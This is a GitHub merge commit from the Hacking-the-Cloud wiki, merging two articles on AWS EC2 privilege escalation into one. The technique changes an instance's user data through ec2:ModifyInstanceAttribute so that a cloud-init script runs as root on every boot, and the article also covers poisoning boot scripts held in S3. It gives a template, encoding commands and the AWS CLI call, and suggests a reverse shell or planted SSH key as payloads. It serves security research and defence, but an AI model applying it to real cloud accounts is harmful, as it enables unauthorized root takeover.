Merge pull request #358 from Hacking-the-Cloud/merge/2_user_data_articles

Merged 2 user data priv esc articles into one
Frichetten committed Jan 22, 2024
2 parents 9c9256e + 293e9bf commit dca6d81
Showing 3 changed files with 105 additions and 108 deletions.
81 changes: 0 additions & 81 deletions content/aws/exploitation/local-priv-esc-mod-instance-att.md

This file was deleted.

27 changes: 0 additions & 27 deletions content/aws/exploitation/local-priv-esc-user-data-s3.md

This file was deleted.

105 changes: 105 additions & 0 deletions content/aws/exploitation/local_ec2_priv_esc_through_user_data.md
@@ -0,0 +1,105 @@
---
author_name: Nick Frichette
title: EC2 Privilege Escalation Through User Data
description: How to escalate privileges on an EC2 instance by abusing user data.
---

## ec2:ModifyInstanceAttribute

<div class="grid cards" markdown>
- :material-shield-lock:{ .lg .middle } __Required IAM Permissions__

---

- [ec2:ModifyInstanceAttribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-instance-attribute.html)

- :material-shield-plus:{ .lg .middle } __Recommended but not Required IAM Permissions__

---

- [ec2:StartInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/start-instances.html)
- [ec2:DescribeInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/start-instances.html)
- [ec2:StopInstances](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/stop-instances.html)
</div>
<div class="grid cards" markdown>
- :material-account:{ .lg .middle } __Original Research__

---

[aws_pwn:elevation](https://github.com/dagrz/aws_pwn/blob/master/elevation/bouncy_bouncy_cloudy_cloud.py) by [Daniel Grzelak](https://twitter.com/dagrz)
</div>

If an adversary has access to the modify-instance attribute permission they can leverage it to escalate to root/System on an EC2 instance.

Usually, user data scripts are only run the first time the instance is started, however this can be changed using [cloud-init](https://aws.amazon.com/premiumsupport/knowledge-center/execute-user-data-ec2/) to run every time the instance restarts.

To do this, first create a file in the following format.

```
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
**commands here**
--//
```

Modify the ```commands here``` section to do whatever action you want. Setting a reverse shell, adding an ssh key to the default user, etc. are all good options.

Once you've done that, convert the file to base64. Linux can do this with the following command.

```base64 file.txt > file.b64.txt```

Windows can do this with the following command.

```certutil -encode file.txt tmp.b64 && findstr /v /c:- tmp.b64 > file.b64.txt```

Now that you've base64 encoded your payload, you will leverage the [ec2:ModifyInstanceAttribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-instance-attribute.html) API call to change the user data of the target instance.

!!! Note
The instance will need to be stopped to modify its user data. You'll either have to stop it yourself, or wait for something else to stop it.

```
aws ec2 modify-instance-attribute \
--instance-id=xxx \
--attribute userData \
--value file://file.b64.txt
```

With that change made, simply start the instance again and your command will be executed with root/System.

## Leverage scripts in S3

A common pattern when using EC2 is to define a [user data](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html) script to be run when an instance is first started or after a reboot. These scripts are typically used to install software, download and set a config, etc. Oftentimes the scripts and packages are pulled from S3 and this introduces an opportunity for a developer/ops person to make a mistake.

If the IAM role is too permissive and allows the role to write to that location, an adversary can leverage this for privilege escalation. Additionally, if there is any other kind of misconfiguration on the bucket itself, or another role which has access gets compromised, an adversary can take advantage of this as well.

Take the following user data script:

```
#!/bin/bash
aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh
chmod +x /root/start_script.sh
/root/start_script.sh
```

On first launch, the EC2 instance will pull the start_script from S3 and will run it. If an adversary can write to that location, they can escalate privileges or gain control of the EC2 instance.

!!! Note
In addition to new instances being spun up or after a reboot, poisoning the scripts/applications can also effect EC2 instances in an [Auto Scaling Group](https://docs.aws.amazon.com/autoscaling/ec2/userguide/AutoScalingGroup.html).
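Review bot: the ec2:DescribeInstances entry in the "Recommended but not Required IAM Permissions" card links to the start-instances reference page instead of describe-instances; change the href to https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html so it matches the permission it names. Two smaller points in the same file: the closing note should read "can also affect EC2 instances" rather than "effect", and the sentence "If an adversary has access to the modify-instance attribute permission" would be clearer as the exact permission name, ec2:ModifyInstanceAttribute, which is how the card above and the later API-call sentence already refer to it.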
